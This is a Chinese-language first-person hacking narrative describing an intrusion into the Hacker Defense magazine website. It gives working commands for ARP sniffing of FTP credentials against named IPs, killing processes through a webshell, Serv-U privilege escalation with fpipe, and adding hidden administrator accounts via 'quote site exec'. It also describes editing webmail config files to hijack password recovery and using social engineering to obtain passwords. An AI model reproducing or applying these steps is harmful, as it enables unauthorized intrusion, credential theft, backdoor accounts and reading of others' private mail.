|
黑客防线——主机外部的危险(2) 用webshell上传我们需要的软件:
WinPcap.exe arpsniffer.exe pv.exe
arpsniffer.exe ------------ 57 k 榕哥的交换环境下嗅探工具
pv.exe ----------------60k (PrcView附带的一个命令行程序,华军有下)杀进程
WinPcap.exe ------------------678k 嗅探所用到的一个驱动程序
安装WinPcap.exe,下一步,下一步,完成。
建立一个隐藏的虚拟目录(怎么建立自己去查资料), 应用程序保护设为低 以便于我们用webshell运行arp程序,不然被管理员发现可就不好。 三、开始嗅探:
OK,继续........开始SNIFFER........由于目前中国网络结构和相关技术人员素质等问题.这个可以说是百发百中,运行:
arpsniffer.exe 211.157.102.254 211.157.102.239 21 c:\111.txt 1
211.157.102.254是网关,211.157.102.239是黑防ip,c:\111.txt是log文件,1是网卡id
接下来要做什么?当然就是等了.......不过我们不想等几天时间.我们希望能再顺利些.告诉黑夜兄弟行动起来,(嘿嘿),独行者在QQ上(黑防很掉一个编辑), 黑夜:
"黑防被黑啦.听说有人上去了.......快看看吧..."
独行者:
好好,我这就去看
此处省略。。。。。 哈哈.........结果不用说了.几分钟后我们看到log文件明显增大,因为arpsniffer进程在运行我们没法直接看,于是用webshell运行:
pv -k -f arpsniffer.exe
kill这个进程,看密码喽~~~~~~ 四、工作中:
丫丫丫,是这个的ftp呀,http://978229.hacker.com.cn/,上传shell,呀!没做安全盘全部可以浏览,呀,呀,呀 小鸭子呀,原来你在e:\wwwroot呀,哈哈。
提升全限,serv-u提升权限,呀怎么不能运行程序呀,呀,原来cmd.exe改成king.exe了呀,net.exe改成了net1king.exe呀,继续 fpipe -v -l 3041 -r 43958 127.0.0.1
添加ftp用户,设为管理员,登陆运行 quote site exec net1king xiaolu xiaoxue /add
quote site exec net1king localgroup administrators xiaolu /add 3389登陆,呀,不行呀,继续 quote site exec net1king xiaolu xiaoxue@@!#!@#@!!@#@123 /add
quote site exec net1king localgroup administrators xiaolu /add 哈哈,还作了密码限制,进去了。接下来我就不说了,让黑防编辑头疼去吧。。。。。。。。(此处省略N多内容) 看看有什么好东西吧,发现有webeasymail服务器哦.看信,看看让编辑们牛比的了不得的资料,不知道密码怎么看呀。 嘿嘿,跟我来:D:/mail/mail/,每个用户目录下都有UserWeb.ini
打开,修改
questionInfo = 1
answerInfo = 1
hintInfo = 1 打开http://hacker.com.cn/mail---忘记密码,添上我们的问题和答案,挖靠,这么多信,有没有没什么好东西啊 该撤退了,剩下的留给编辑们去搞吧。
五:总结:
本次入侵历时1个小时左右,没有什么高深的技术,都是些比较浅显的技术,嗅探渗透是好几年前的技术了,sql注入是比较流行的方法,也不算新了,能这么快得到ftp密码多亏了黑夜"社会工程学"的运用。
技术虽然很值钱,灵活运用会使技术更有价值。
|
